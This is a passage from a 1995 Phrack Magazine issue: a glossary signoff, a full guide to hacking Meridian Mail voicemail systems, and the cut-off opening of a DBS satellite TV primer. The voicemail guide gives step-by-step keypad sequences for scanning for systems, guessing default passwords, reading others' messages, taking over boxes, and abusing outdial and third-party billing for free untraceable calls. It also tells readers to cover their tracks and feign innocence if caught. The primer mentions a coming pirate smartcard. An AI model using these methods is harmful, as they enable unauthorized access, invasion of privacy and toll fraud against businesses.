  13925. Handshake, Handshaking - A preliminary process that is part of a
  13926.          communications protocol that establishes a data connection.
  13927. Interface - The connection between two separate and distinct mechanical or
  13928.          computerized systems.
  13929. Interoffice Trunks - Shared facilities connecting CO switches.
  13930. Link - A communications circuit.
  13931. Local CO - Central office (end office) capable of switching calls between
  13932.          local subscriber circuits.
  13933. Local Loop - The voice-band channel connecting the subscriber to the central
  13934.          office.
  13935. Logging - Recording data associated with a system.
  13936. Multiplexing - The division of a transmission facility into two or more
  13937.          channels.
  13938. Network - An interconnection of computer systems, terminals, or data
  13939.          communications facilities.
  13940. Parameters - Variables designed for system uses.
  13941. Port - A computer interface capable of attaching a communication protocol.
  13942. PBX or PABX - (Private <Automatic> Branch Exchange) A system providing
  13943.          switching in an office or building.
  13944. Voice PABX - Voice only PABX for voice circuits.
  13945.  
  13946. ----------------
  13947.  
  13948.  
  13949.       I hope you could use this information.  If anyone has any questions
  13950. or comments, or is wondering if they can get manuals to this system somehow,
  13951. please feel free to email me, I will assist you as much as my schedule will
  13952. allow.  I would like to thank erikb for telling me to write this, abstract
  13953. thought for pointing out all my spelling errors among other things, panzer
  13954. for everything he has done, and all the dc hackers.
  13955.  
  13956. Knowledge is the nemesis of all evil, Digital Anarchy!!!
  13957. Later, and remember to always cover your tracks in anything you do.
  13958.  
  13959.  
  13960. Armitage
  13961.  
  13962. armitage@dhp.com
  13963.  
  13964.   finger/email for PGP key if desired.
  13965.                               ==Phrack Magazine==
  13966.  
  13967.                  Volume Six, Issue Forty-Seven, File 15 of 22
  13968.  
  13969.  
  13970. Substance's Complete Guide To Hacking Meridian Mail Systems (VMB) [PART 1]
  13971. --------------------------------------------------------------------------
  13972.  
  13973. Feb 1st, 1995  --Made for Phrack
  13974.  
  13975. Introduction To Meridian Mail Box Systems
  13976.  
  13977. By Substance @ Another Way of Life [hpavc] 518˙383˙1369
  13978.  
  13979. NOTE1: In case you didn't know VMB stands for Voice Mail Box
  13980.  
  13981. NOTE2: This is the information that I have gathered from hacking
  13982.        Meridians, and is not guaranteed to be 100% accurate
  13983.  
  13984. NOTE3: Disclaimer : There is none, I did this article to encourage people to
  13985.        go and fuck around with Meridians, so sue me.
  13986.  
  13987. ------------
  13988. Introduction
  13989. ------------
  13990.  
  13991. Before we begin, Let's shed a little light on the subject of Meridian.  This
  13992. is one of my favorite VMB systems to hack, because:
  13993.  
  13994. Number 1    : There are many Meridian VMB Systems throughout the country, in
  13995. --------      800 exchanges and numbers local to you. You can bet that there
  13996.               are at least 10 - 15 different corporations using Meridian
  13997.               throughout your area code
  13998.  
  13999. Number 2    : (The Most Important by far.)  Almost ALL Meridian mails
  14000. --------      use the Mail Box number as the default password. (Unless changed
  14001.               manually)
  14002.  
  14003. Number 3    : About 95 percent have outdialing features.  Most don't have long
  14004. --------      distance access, but this can still be very useful for diverting
  14005.               calls, and getting free calls in that area code.
  14006.  
  14007.  
  14008. Ok, enough light shed on the matter. Let's get to identifying and hacking
  14009. those fuckers!
  14010.  
  14011. --------------------------
  14012. Identifying Meridian VMB's
  14013. --------------------------
  14014.  
  14015. Most Meridian VMBs just come right out and say exactly what they are.  I'd
  14016. say about 8 out of 10 will just come out, right after it answers and say:
  14017.  
  14018. "MERIDIAN MAIL"
  14019. <wait 1 second>
  14020. "MAILBOX?"
  14021.  
  14022. or just
  14023.  
  14024. "MAILBOX?" (it is ALWAYS a female computer [digitized] voice)
  14025.  
  14026. Half the time you will only hear "RIDIAN MAIL". (This must be caused by
  14027. a timing bug in Meridian.)  Once you hear that, write the # down, since
  14028. it may be useful in the future for such things as 3rd party billing
  14029. (more on that later), as a code line or just as a personal VMB.  If you know
  14030. for a fact (or a guess in that matter) that this is a Meridian mailbox but
  14031. when you call it, it just says 'Leave a message' or has someone actually
  14032. talking instructing you to leave a message, then you have reached what might
  14033. be a direct VMB line. These are usually numbers people pay more money for, that
  14034. will give them a direct 800 number instead of going through the "mailbox #"
  14035. part.
  14036.  
  14037. These are the best, but probably the hardest to hack, because even though
  14038. (according to a recent poll) about 70% of people are stupid enough to leave
  14039. their mailbox number as their password, if you are serious and want to
  14040. pay that much for a direct line, you are probably going to change the
  14041. password. Even though I have seen many that do have the default, the
  14042. odds are against it.
  14043.  
  14044. Ok back to the point.  If you find a direct VMB, call all the numbers around
  14045. it, because chances good are that you will find the system that just asks
  14046. for a box number, very close.  I would recommend about +50 numbers and -50
  14047. numbers and you'll find the root system.  You will also find many other
  14048. direct boxes in your quest.
  14049.  
  14050. NOTE: The ROOT SYSTEM is the number you call and simply hear 'MAILBOX' or
  14051.       'MERiDiAN MAiL'
  14052.  
  14053. Another thing to remember is that you have to find out how many digits your
  14054. mailbox #'s are going to be.  The number of digits I've seen in my career
  14055. differs from about 2 digits (rare) to 6 (also fairly rare).  The most likely
  14056. # of digits it will probably have is 4, or 5...  Call your VMB and when it asks
  14057. for mailbox #, hit '111#' (Note: You ALWAYS have to end a command on a Meridian
  14058. mail system with an '#') if it says (with a quick response) 'INVALID box #'
  14059. then try a 4 digit code.  Sometimes (yeah, I know it sucks) you will
  14060. have to fuck around for a while before you can tell how many digits, or even
  14061. worse you may never know, and have to keep alternating #'s of digits, until
  14062. you hit a valid box.
  14063.  
  14064. Hacking The Fuckers:
  14065.  
  14066. First off, think of what you are going to record as an outgoing message before
  14067. you go and hack it.  Decide if this should be a code line, or a personal VMB,
  14068. or... Both?  Here are the first default boxes you should try before dialing
  14069. random ones:
  14070.  
  14071. 111 222 333 444 555 666 777 888 999 000 100 200 300 400 500
  14072. 600 700 800 900 123 234 345 456 567 678 789 890 901 121 212
  14073. etc. etc. etc.
  14074.  
  14075. If boxes are 4 digits, add a trailing number.  If you don't know the length,
  14076. mess around a while, you'll get one.
  14077.  
  14078. If you call someone's direct VMB and you hear a message like "You have
  14079. reached So&So's VMB please leave a message, and I will return your call as
  14080. soon as possible" there are a few ways to transfer to a different mailbox.
  14081. Try simply hitting #, that might just hang up on you, unfortunately.
  14082. Call back try hitting *.  When you hear 'MAiLBOX' you just struck home.
  14083. Try entering 123#.
  14084.  
  14085. Now, a few things can happen. Either:
  14086.  
  14087.         1  It will transfer you to 123's mailbox
  14088.         2  It will say invalid mailbox, or simply 'MAILBOX' again
  14089.         3  It will say Password
  14090.  
  14091. When you hear 123's mailbox you can try and hack it by hitting *, and hope
  14092. it will ask 'PASSWORD?'  If it doesn't then you can't do much with this
  14093. system except leave messages for that person (What Fun).  If it does ask
  14094. "PASSWORD?" then try the box # as the default password.  (On your quest for a
  14095. valid VMB you will find that MANY MANY people are total fucking morons
  14096. and keep their password at the default) others will make it something easy to
  14097. remember like 123# or 111# etc. etc. etc.  If the password is not the Default
  14098. then just write this number down in a notebook and move on.
  14099.  
  14100. If all else fails and you can't figure out how to get to the MAILBOX prompt you
  14101. should call all the #s around the one you found to try and find the root
  14102. system.
  14103.  
  14104.  
  14105. If you get in, (with the default or otherwise) it will probably say:
  14106.  
  14107. 'MAILBOX EMPTY' or 'YOU HAVE n MESSAGES'
  14108.  
  14109. If you press 7* it will reply with:
  14110.  
  14111. Message option 0        (unknown at this time)
  14112. Reply 1                 (used to reply to a previous message)
  14113. Play envelope 2         (unknown at this time)
  14114. Forward 3               (Forward your mail to another box)
  14115. Reply all 4             (Reply with a multi-mail)
  14116. compose 5               (send multi-mail)
  14117. delete 6                (used to delete mail [duh])
  14118. send 9                  (sends single mail [must have mailbox number ready)
  14119.  
  14120.  
  14121. if you press 8* it will reply with:
  14122.  
  14123. Mailbox options 0       (Changes operator code (not useful)
  14124. login 1                 (Gives you the option to transfer mailbox's)
  14125. greeting 2              (Can change greeting (internal & external)
  14126. logoff 3                (Kicks you off the system)
  14127. password change 4       (Changes VMB password [verifies 2x]
  14128. distribution list 5     (Not useful)
  14129. goto 6                  (Takes you back to 'MAILBOX EMPTY'
  14130. Personal verification 9 (Lets you record a name for personal verify)
  14131. to exit press #         (logoff)
  14132.  
  14133. This is not all very useful, the most you can do with these commands is listen
  14134. to people's mail (which can be fun), and/or take it over for your own code line
  14135. or personal VMB.  The whole point of hacking Meridians is the outdial function.
  14136. Once you have successfully gotten into the VMB dial '0*' (Zero-Star).
  14137. It should say:
  14138.  
  14139. 'YOU HAVE REACHED A SYSTEM THAT WILL CONNECT YOU TO THE NUMBER THAT YOU ENTER.
  14140. PLEASE ENTER THE NUMBER OR THE NUMBER OR THE NAME OF THE PERSON YOU WISH TO
  14141. REACH. PRESS 11 FOR A NAME, SPELL THE LAST NAME THEN THE FIRST NAME blah,
  14142. blah, blah.'
  14143.  
  14144. This is the jackpot.  With this you can call ANYWHERE (hopefully) for free, any
  14145. time (unless the VMB has hours [...some do...]) To dial out, try this first:
  14146.  
  14147. just dial a local number (ex 432-1342#)
  14148.  
  14149. >From there it may beep and say 'THAT # CANNOT BE REACHED' or it may connect
  14150. you.  If it connects you, great!  You just found an untraceable way of hacking!
  14151. Call back and try 1-npa/xxx-yyyy (if that works, then abuse the hell out of it
  14152. as soon as possible, because it wont last for long :) )  If those two methods
  14153. don't work try these.
  14154.  
  14155.                             9+1+npa/xxx-yyyy  (works most of the time)
  14156.                             8+1+npa/xxx-yyyy  (not probable)
  14157.                             0+1+npa/xxx-yyyy  (Possible)
  14158.                             9+xxx-yyyy
  14159.                             8+xxx-yyyy
  14160.                             0+xxx-yyyy
  14161.  
  14162. If none of those work, then you're shit out of luck. Use it for a code line.
  14163. If it did work, think of the possibilities, 900 numbers (for gaining access
  14164. to boards), Tons of free LD, untraceable calls............
  14165.  
  14166. On to the last subject of part 1.
  14167.  
  14168. ------------------------------
  14169. Another Way To Make Free Calls
  14170. ------------------------------
  14171.  
  14172. Sorry, this only works on Direct VMB's, sometimes only the ones in your local
  14173. exchange, its a long shot, but hell, its free.  (But don't do this from your
  14174. home phone, stupid.)
  14175.  
  14176. Change the outgoing message on the direct VMB to 'Operator, this number accepts
  14177. all collect and 3rd party billings'  Call up the operator and ask for AT&T,
  14178. once they come on tell her you would like to make a 3rd party billing.  Tell
  14179. her the number you're billing to is the VMB #, then tell her the number you
  14180. wish to call. She'll say, "wait," AND a few moments later she'll come back
  14181. and say they accepted.  Presto!  You're in!
  14182.  
  14183. If you get busted, say you read a text file on how to do it, you didn't think
  14184. it would work... (act innocent, alwayz worked for me :)
  14185.  
  14186.  
  14187. You can leave me comments, suggestions or threats at my VMB
  14188. (not a Meridian currently)  *(800)775-0728* (direct)...
  14189.  
  14190.  
  14191. -substance
  14192.  
  14193. [EOF] 
  14194.                               ==Phrack Magazine==
  14195.  
  14196.                  Volume Six, Issue Forty-Seven, File 16 of 22
  14197.  
  14198. [Editor's Note:  This info and much more can be obtained from
  14199. American Hacker Magazine, 3494 Delaware Ave., #123, Buffalo, NY 14217.
  14200. 716-874-2088 (voice/fax) 716-871-1915 (bbs) snews@buffnet.net
  14201. $29.95 for 12 issues, including BBS access.  I you are into satellites,
  14202. you might want to check this out!]
  14203.  
  14204.  
  14205.                  DBS Primer (c) Scrambling News (TM) 1995
  14206.  
  14207. Preface
  14208.  
  14209. This text lacks the photos and schematics which accompanied
  14210. the article when it appeared in our newsletter. Constructive
  14211. criticism, corrections, and suggestions for information which
  14212. should be added are all welcome. We are snews@buffnet.net
  14213. or 716.874.2088. As always we include information regarding
  14214. gray and black market activity involving the RCA system. The
  14215. big news is that we expect a pirate smartcard to become
  14216. available soon. There is more information about that later in
  14217. the second part of this article.
  14218.  
  14219. Brand names and trademarks are used herein for identification
  14220. purposes only and are the property of their respective owners.
  14221. Use of same within this document definitely does not imply agreement
  14222. with or endorsement of the material presented. Information
  14223. published by Scrambling News is intended for educational and
  14224. entertainment purposes only and must not be used for any other
  14225. purpose.
  14226.  
  14227. Introduction
  14228.  
  14229. We in the middle of an advertising blitz by RCA, DirecTV, USSB
  14230. and Prime star announcing that the age of digitally delivered
  14231. entertainment has arrived. Major newspapers, magazines and
  14232. cable channels are saturated with commercials featuring the
  14233. new RCA DSS 18 inch satellite dishes and all media have done
  14234. their job to promote the new systems.
  14235.  
  14236. It is true that we are in the middle of a revolution. Other
  14237. small dish satellite systems are in the development stage,
  14238. the telco's are getting into the cable business, cable is
  14239. testing interactive services, and C/Ku-band satellite TV has
  14240. been around since the late '70s but it too, is in transition.
  14241. In this article we will focus on some aspects of the new
  14242. DirecTV 18 inch dish system. We covered the Videocrypt
  14243. encryption system in a previous article.
  14244.  
  14245. GM Hughes DirecTV is a venture involving GM's Delco
  14246. Electronics and Hughes Aircraft. The two have put about
  14247. $750 million into the business while Hubbard Broadcasting,
  14248. a service provider has added $150 million, including $25
  14249. million from Dow Jones. RCA has pledged $100 million. RCA
  14250. has exclusives rights to manufacture the hardware for the
  14251. first 1 million systems. The DSS brand system is owned by
  14252. Thomson Consumer Electronics of Paris. Sony will also
  14253. manufacture the dish and receiver systems after RCA
  14254. sells the first million. They expect to have their system
  14255. on the market in June. The $699 list price of the basic
  14256. system is currently holding firm, because of demand. Thomson
  14257. Consumer Electronics has been offering the systems free to
  14258. purchasers of TCE (RCA) widescreen TV's at Sears, Circuit City,
  14259. etc. in the Denver, LA, Chicago and Atlanta markets. The Thomson/Hughes
  14260. system is unique in offering movies in widescreen format. That
  14261. is why the RCA CinemaScreen TV's have not moved well until now.
  14262.  
  14263. GM Hughes DBS system launched this past summer and only rolled
  14264. out nationally in September. By mid October over 100,000 systems
  14265. had been sold. Over 3,000 are now being sold per day and Thomson
  14266. has reported sales of over 500,000 systems as of the week before
  14267. Christmas. This represents sales 10-15% ahead of projections.
  14268. Hughes predicts there will be 3 million systems in use by mid
  14269. 1996 and 10 million by the year 2000. The break even point is 3
  14270. million systems. RCA is currently manufacturing 100,000 systems
  14271. /month. GM Hughes is a company which has survived the downsizing
  14272. in the defense industry. Of its $14 billion estimated 1994
  14273. revenue, 41% is derived from its defense business which includes
  14274. Tomahawk cruise missiles. About 37% comes from its automotive
  14275. electronics business which includes air bag sensors, car radios
  14276. and instrument panels, mostly for GM cars. DirecTV is only part
  14277. of the telecommunications division which includes a mobile
  14278. cellular business and the leasing of satellite transponders.
  14279. When GMH has sold 3 million systems. DirecTV will be a $3
  14280. billion/yr business of which $1 billion will be operating
  14281. profit.
  14282.  
  14283. Programming
  14284.  
  14285. Available Programming is conveniently divided between two
  14286. separate sources, forcing most consumers to subscribe to both.
  14287. The programming carried by DirecTV and USSB is unique to each
  14288. and each has a monopoly. USSB supplies ANC (All News Channel),
  14289. VH1, Lifetime, Nick, Flix, Cinemax, Cinemax2, Cinemax West,
  14290. TMC, TMC West, HBO, HBO2, HBO3, HBO West, Showtime, Showtime2,
  14291. Showtime West, MTV, and the Comedy Channel. The Essentials
  14292. package for $7.95/month includes Lifetime, the Comedy Channel,
  14293. Nick, Nick at Night, MTV, VH-1 and the All-News Channel. A
  14294. package of all HBO and Cinemax feeds costs $10.95. A similar
  14295. package with all Showtime /TMC channels plus Flix also costs
  14296. $10.95. Showtime Plus includes the Showtime/TMC package
  14297. together with Flix and the Essentials package for $24.95.
  14298. Entertainment Plus includes all USSB channels for $34.95/month.
  14299.  
  14300. DirecTV supplies the remaining channels and PPV (pay per view)
  14301. programming. All subscribers receive ESPN, the Cartoon channel,
  14302. USA, CNN, Trio (family entertainment and news), Headline News,
  14303. Discovery, C-Span, TNT, TBS, TNN, TCM (Turner Classic Movies),
  14304. Bloomberg Direct (financial news), and MuchMusic (Canadian MTV),
  14305. Disney, and Music Choice (formerly Digital Cable Radio) which
  14306. consists of 28 channels of CD quality commercial-free genre
  14307. music ranging from symphonic to rap.
  14308.  
  14309. Personal Choice subscribers may choose 10 additional channels
  14310. from E!, the Weather Channel, Newsworld International (Canadian
  14311. with BBC), Sci-Fi Channel, Court TV, Family and Travel channels,
  14312. C-Span 2, CNN International, the Learning Channel, CNBC, the
  14313. Learning Channel, Country Music Television, A&E, or the Encore
  14314. multiplex which includes Encore plus six channels dedicated to
  14315. love stories, mysteries, westerns, childrens' programming,
  14316. action, and true stories. All the above channels are available
  14317. in the Total Choice package for $29.95. Channels available ·
  14318. la carte include Starz for $1.80, Playboy for $9.95 and TV Asia
  14319. for $5.95. A new addition is the Golf Channel on channel 304
  14320. for $6.95/month.
  14321.  
  14322. Subscribers to the sports package currently receive eight
  14323. regional sports networks for $7.95/month. These include Home
  14324. Team Sports, Home Sports Entertainment, KBL Sports, Pro Am
  14325. Sports System, Prime Sports, Prime Ticket, SportSouth and
  14326. Sunshine Network. DirecTV says it will expand the number of
  14327. regional networks it carries but no definite plans have been
  14328. announced. Packages including all NHL and NBA games are also
  14329. available. A minimal package which includes only access to
  14330. PPV and Bloomberg Direct costs $5.95 per month.
  14331.  
  14332. Approximately 54 channels are devoted to PPV movies and
  14333. there are preview and special events channels as well.
  14334. Approximately 36 movies are available at any given time and
  14335. they cost $2.99 each. Subscribers receive a $2.50 credit
  14336. per month which may be applied to the cost of any PPV or
  14337. special event. DirecTV has just signed an agreement with
  14338. Twentieth Century Fox so its films will also be available on
  14339. PPV.
  14340.  
  14341. DirecTV plans to launch DBS-3 late this summer and it will
  14342. add at least 30 more channels. The satellite was originally
  14343. scheduled for launch in December but mechanical problems
  14344. have caused a delay. The two existing satellites provide a
  14345. total capacity of about 175 channels.
  14346.  
  14347. Features
  14348.  
  14349. The basic $699 system supports only one master TV. That means
  14350. that all televisions in the house must be tuned to the same
  14351. channel. Unlike cable, it is not possible to watch one channel
  14352. in the living room, while the kids watch another in the recroom
  14353. and the wife watches yet a different channel in her coven. The
  14354. deluxe system consists of two receivers and it supports two
  14355. independent television receivers or a TV and a VCR. It consists
  14356. of a dual feed LNB mounted on the 18" dish and two receivers.
  14357. The cost is $899 plus $650 for the second receiver. Both
  14358. receivers have a wideband data port which will supposedly be
  14359. used for HDTV. The deluxe receiver includes a slow speed 9 pin
  14360. port for future data services and a second set of baseband
  14361. audio/video output jacks. Other than these differences and
  14362. the ability to subscribe a second receiver at reduced rates,
  14363. the two receivers are the same.
  14364.  
  14365. Those who wish to record programs must leave the receiver on
  14366. the channel to be recorded. It has no ability to change
  14367. channels and it cannot be programed to do so or even to
  14368. turn on at a certain time. According to Thomson, the ability
  14369. of the RCA system to change channels was omitted for
  14370. legal reasons. The rights for recording through the on-screen
  14371. guide belong to StarSight. Their system is available as a
  14372. stand-alone box for cable or over-air use or as an
  14373. integrated part of a television, VCR or C-band satellite
  14374. receiver. It is expected that the time recording feature
  14375. will be added when the legal problems are resolved.
  14376. According to a company spokesman, the lack of the recording
  14377. feature will not hurt initial sales since purchasers will
  14378. be rural and will be more concerned with programming than
  14379. with features. For now, those who wish to have two
  14380. independently controlled TV's or a TV and a VCR must
  14381. purchase the deluxe system. Even then, the second receiver
  14382. must be left on the channel to be recorded.
  14383.  
  14384. Local channels are not available from either of the DBS
  14385. services or C-band. In the case of the DBS services, it
  14386. is illegal for them to offer local channels. The FCC
  14387. imposed this regulation so that DBS would not compete with
  14388. over-air services. DirecTV does offer a package of the net
  14389. works including ABC, NBC, CBS, FOX and PBS for $3.95/month.
  14390. It is intended only for those in the "white" areas of the
  14391. country where over-air reception is not possible. Those who
  14392. have subscribed to cable within the last 90 days are not
  14393. eligible to receive it, even if over-air reception is
  14394. impossible. A loophole is that those who live in an area
  14395. where over-air reception is possible may subscribe to the
  14396. network package if over-air reception is not of acceptable
  14397. quality in their own judgement. Typical problems include
  14398. severe ghosting and having reception blocked by mountains
  14399. or buildings, To the best of our knowledge, there is no
  14400. verification process to determine whether a DBS subscriber
  14401. is also a cable subscriber. Those who qualify to subscribe
  14402. to the package will receive ABC from NY, CBS from Raleigh,
  14403. FOX from Chicago, and PBS from Denver. This package costs
  14404. 3.95/month.
  14405.  
  14406. Both RCA and Primestar receivers include Macrovision copy
  14407. protection chips. Neither system employs them at this time.
  14408. Their use is dictated by copyright holder (movie studio)
  14409. demands. In addition to the studios there is another force
  14410. at work which could, in the future, limit the right of
  14411. individuals to record programs. A draft paper from the
  14412. Information Infrastructure Task Force recommends that
  14413. digital transmission be redefined as a type of distribution
  14414. like publishing, which should be controlled by the copyright
  14415. holders. This proposal, if unchallenged could cause the
  14416. Commerce Department to change copyright laws and make the
  14417. recording of any programming illegal. All products which
  14418. defeat copy protection schemes would become illegal.
  14419.  
  14420. The right to purchase and use a VCR is covered by the first
  14421. sale doctrine and was won in the Sony Betamax case in the
  14422. '80s. Americans currently have the right to record programming
  14423. based on both the first sale and fair use doctrines.
  14424. If the ability of consumers to record programming is not
  14425. supported in the future, for whatever reason, DBS subscribers
  14426. will be the first to find out.
  14427.  
  14428. The on-screen program guide is a user friendly feature. It
  14429. provides program and movie descriptions up to 24 hours in
  14430. advance using a dedicated button. There are two favorite
  14431. program lists, each of which can store 10 channels. It is
  14432. also possible to choose programs by categories which include
  14433. sports, movies, specials, series, news, and shopping. Accessing
  14434. program information several hours in advance is actually
  14435. quite slow, due to memory limitations, but the feature is
  14436. still valuable.
  14437.  
  14438. Other major features of the system are sound and picture quality.
  14439. The sound is of CD quality. Picture quality is superior
  14440. to that available on Video CD's. During the fall there were
  14441. problems with the system. These include freeze frames, which
  14442. caused the picture to freeze for a few seconds, and digital
  14443. artifacts during shot changes. At times the picture would break
  14444. up, leaving large rectangular colored blobs on the screen.
  14445. These problems have decreased considerably during December and
  14446. January and are now infrequent. The DSS system is currently
  14447. using MPEG-1 and will switch over to MPEG-2 later this year.
  14448. This may improve signal quality even more. Changes will be
  14449. made to headend encoders and not to subscribers' equipment.
  14450.  
  14451. Installation
  14452.  
  14453. The two DSS satellites are co-located in geostationary orbit
  14454. at 101∫ west longitude. That is over the equator, south of
  14455. Texas. There must be a clear line of sight from the dish to
  14456. the satellite. The signals cannot pass through trees, leaves
  14457. in summer or buildings. The dish may be mounted behind a
  14458. glass window in a patio for example. This can cause reception
  14459. problems during extreme weather. It should not be mounted less
  14460. than 20 feet from overhead power lines.
  14461.  
  14462. The dish may be mounted directly on a 1 1/4" I.D. Schedule
  14463. 40 (1 5/8" O.D.) preferably galvanized pipe. The system
  14464. includes a mounting foot so it may also be mounted on the
  14465. side of a structure, on a roof or chimney or patio deck.
  14466. The surface must be stationary. Mounting on a roof is
  14467. least desirable. A roof mount can cause damage to the roof
  14468. and cause leaks. Wind loading can cause hundreds of pounds
  14469. of force on the screws securing the mounting foot. Chimney
  14470. mounts kits are also available as an option.
  14471.  
  14472. The dish must be grounded where it is mounted and the
  14473. coaxial cable must be grounded using a grounding block
  14474. where it enters the residence. One RG-6 cable is used for
  14475. the connection between the dish and receiver. If the cable
  14476. will be longer than 112 feet, a TVRO bullet amplifier is
  14477. recommended though we have heard of 150 foot runs with no
  14478. problem. Keeping the mounting pole or mounting foot plumb is
  14479. the key to making dish alignment easy, especially for those
  14480. who have no experience installing satellite systems. DSS
  14481. uses an on-screen menu system and homing signal to align
  14482. the dish. A dish which is not plumb negates the value of
  14483. this user-friendly system.
  14484.  
  14485. The single best feature of DSS is the setup system. It is
  14486. so user-friendly that even a novice can set the dish up
  14487. himself. It is also this feature which makes the system
  14488. truly portable. No electronic test equipment except a
  14489. television receiver is necessary to align the dish.
  14490. According to DirecTV, more than 40% of purchasers are
  14491. doing their own installations. There is no reason why an
  14492. average person cannot install the system. There are no
  14493. components which can be harmed or destroyed by a botched
  14494. attempt. The worst that can happen is that it might be
  14495. necessary to have someone complete the job.
  14496.  
  14497. It is economical to install another dish with an LNBF
  14498. (Low Noise Block amplifier with Feedhorn) at the cottage
  14499. and simply transfer the receiver back and forth. Several
  14500. companies are now manufacturing DBS related products.
  14501. These include a patio style mount, a roof bubble so the
  14502. dish may be aligned from inside the home, and portable DBS
  14503. kits which, in conjunction with a Power inverter, allow
  14504. the dish to be used nearly anywhere in North America.
  14505.  
  14506. The setup menu is a sub menu of the main/options menu. The
  14507. dish pointing  menu allows the installer to receive elevation
  14508. and azimuth settings based on either zip code or latitude and
  14509. longitude. Entering the zip code produces a screen which
  14510. provides the elevation setting as marked on the LNB support
  14511. arm. The azimuth or direction setting is the compass reading
  14512. used to point the dish. It is already corrected for magnetic
  14513. deviation. When we installed the system in Buffalo, the screen
  14514. said to set the elevation to 35∞ and the azimuth to 220∞.
  14515.  
  14516. The computer will not calculate latitude settings greater than
  14517. 55∫ or less than 20∫, corresponding to locations in Mexico and
  14518. Canada. Some individuals in those regions who are installing
  14519. systems simply project a north to south line on a map to the
  14520. closest US town. Then they call the local U.S. Post Office to
  14521. get the zip code, claiming that they recently moved there but
  14522. can't find their zip code. This will provide the azimuth
  14523. information but not the elevation. The elevation setting on
  14524. the dish changes approximately 1∞ per degree of change in
  14525. latitude. After the dish has been positioned, the signal
  14526. meter menu is brought up. It is an option on the dish pointing
  14527. menu. There is a homing signal which starts out as a short
  14528. intermittent tone before the signal is locked. As the dish is
  14529. zeroed in on the signal, the tone increases in length until it
  14530. becomes continuous. When moving the dish it is important to
  14531. wait two beeps in order to see and hear the results of the
  14532. movement. It is a common error for installers to continuously
  14533. move the dish around without waiting. In addition to the audible
  14534. tone, the signal meter screen will state how many
  14535. degrees and in what direction the dish should be moved. When
  14536. we installed our dish the screen said to move it 12∫ west.
  14537. Once the digital signal is locked the screen says "locked
  14538. onto signal."
  14539.  
  14540. Once the signal is locked on, the system must be fine tuned.
  14541. This is done by moving the dish east until the signal is
  14542. lost and then to the west. These positions are marked on
  14543. the mounting pole. The dish should then be positioned in
  14544. the center of these two marks. The same is done with the
  14545. elevation setting. Some individuals simply watch the signal
  14546. strength meter and obtain the maximum reading. We had a
  14547. final signal strength of 85 when we set up our dish.
  14548.  
  14549. The set up system allows for a large margin of error. The
  14550. original dish settings don't have to be very accurate.
  14551. It is because of the homing signal that anyone can easily
  14552. do the installation. The installer guide which comes with
  14553. the system is very well written and is very helpful. There
  14554. is an accessory kit available which includes a videotape
  14555. covering installation but we don't believe it is necessary.
  14556. It is important to ground the system properly, for safety
  14557. and insurance reasons. The only available free programming
  14558. consists of DirecTV barker channels and Bloomberg Direct
  14559. (business news) on channel 245. Having the board authorized
  14560. takes only a few minutes. USSB provides the first month of
  14561. programming free.
  14562.  
  14563. Primestar
  14564.  
  14565. Another option for some of those interested in a dish system
  14566. is Primestar. One of the big advantages of Primestar is the
  14567. low startup and maintenance cost. It isn't necessary to
  14568. purchase their equipment. The rental cost is included in the
  14569. monthly fee. Subscribers do not have to pay for future system
  14570. upgrades which will include HDTV. Prices for installation and
  14571. programming packages vary across the country because they are
  14572. set by the individual cable distributors, not Primestar. It is
  14573. possible to purchase a Primestar system for approximately $900
  14574. but there is no financial reason to. Do-it-yourself installations
  14575. are not permitted and range in cost from $149-299.
  14576.  
  14577. Primestar was founded in 1990 by GE, Continental Cablevision,
  14578. Cox Cable, Westinghouse Broadcasting, TCI, Time Warner, and
  14579. Comcast Cable. It was the first quasi DBS service and was
  14580. launched on GE's Satcom K-1 Ku-band bird. By 1994 Primestar
  14581. had only signed 70,000 customers in 48 states. Until last
  14582. year it broadcast 11 analog video plus six audio channels in
  14583. the 11.7-12.2 GHz FSS (Fixed Satellite Service) band. Currently,
  14584. Primestar uses 14 transponders powered at 47 watts
  14585. each. Late last year they swapped out their analog B-MAC
  14586. decoders and replaced them with Digicipher 1 decoders.
  14587. There are now more than 100,000 Primestar customers.
  14588.  
  14589. Primestar Programming Packages
  14590.  
  14591. The Economy Pak, for $29.95 is a 30 channel service which
  14592. includes CNN, C-Span, Discovery, Cartoon Network, Family
  14593. Channel, TLC (The Learning Channel), TBS, TVT, USA, Headline
  14594. News, Prime Sports Network (14 regional sports channels),and
  14595. where available, the nework stations including ABC, NBC, CBS,
  14596. Fox and PBS. The $36.95 Value Pak adds A&E, Country Music TV,
  14597. Lifetime, TNN, Sci-Fi Channel, TCM, Weather Channel, and the
  14598. Encore multiplex. The Family Pak is a 76 channel package
  14599. which includes all of the above and adds three HBO's, two Cine
  14600. max channels and Disney East and West. HBO, Cinemax, Disney
  14601. TV Japan are also available · la carte for $8.95 each. Prime
  14602. Cinema PPV movies cost $4-5 each. X*Press Executive and
  14603. X*Press Change, which offer computer delivered news, sports,
  14604. stock, and entertainment information are also available for
  14605. $59.40/year plus the cost of the computer interface. Primestar
  14606. does not yet have contracts with Viacom so it does not offer
  14607. Showtime/TMC, MTV and Nickelodeon. In March, Playboy, Starz,
  14608. CNNI, QVC, CNBC, and the Golf channels will be added to the
  14609. lineup. Other channels are being negotiated as well, including
  14610. the DMX music service. Primestar is currently limited to
  14611. about 77 channels. A network package from Primestar, for
  14612. those who qualify to receive it, costs $5.95.
  14613.  
  14614. The dish used by Primestar is approximately 36 inches in diameter
  14615. while the RCA dish is 18 inches. This may matter in some
  14616. neighborhoods where a dish is considered a blight on the community.
  14617. The size of the Primestar dish precludes it from being
  14618. mounted on a chimney, the side of a house or patio railing for
  14619. example. The system is not portable. While the DSS satellites
  14620. operate at 120 watts of power, Primestar operates at 47 watts
  14621. so it requires a larger dish. On the other hand it does not
  14622. suffer from rain fade problems or the glitches DSS has had.
  14623.  
  14624. Primestar does not have an on-screen menu system like DSS does.
  14625. It  carries the Prevue channel which only provides basic pro
  14626. gram information up to 90 minutes in advance. It simply scrolls
  14627. through the channels, and displays only channel and program
  14628. title. Primestar charges $3.95 for PPV movies and the system
  14629. reports monthly purchases via modem, the same way DSS does.
  14630.  
  14631. Primestar is somewhat more friendly to those who wish to
  14632. record programming. It has several timers which can be used
  14633. to program the receiver to change channels at a certain time.
  14634. It also has one favorite channel list which can contain any
  14635. number of channels. Both systems have data ports though
  14636. Primestar currently has data services available.
  14637.  
  14638. The service is considering a move from its current medium
  14639. power satellite to one or more high power satellites, or it
  14640. may choose to add a high power satellite to the one it has
  14641. now. Either way is promises to offer 150 channels by 1996.
  14642.  
  14643. Primestar uses the Digicipher 1 and the picture appears to
  14644. be of slightly higher quality than the DSS picture. The sound
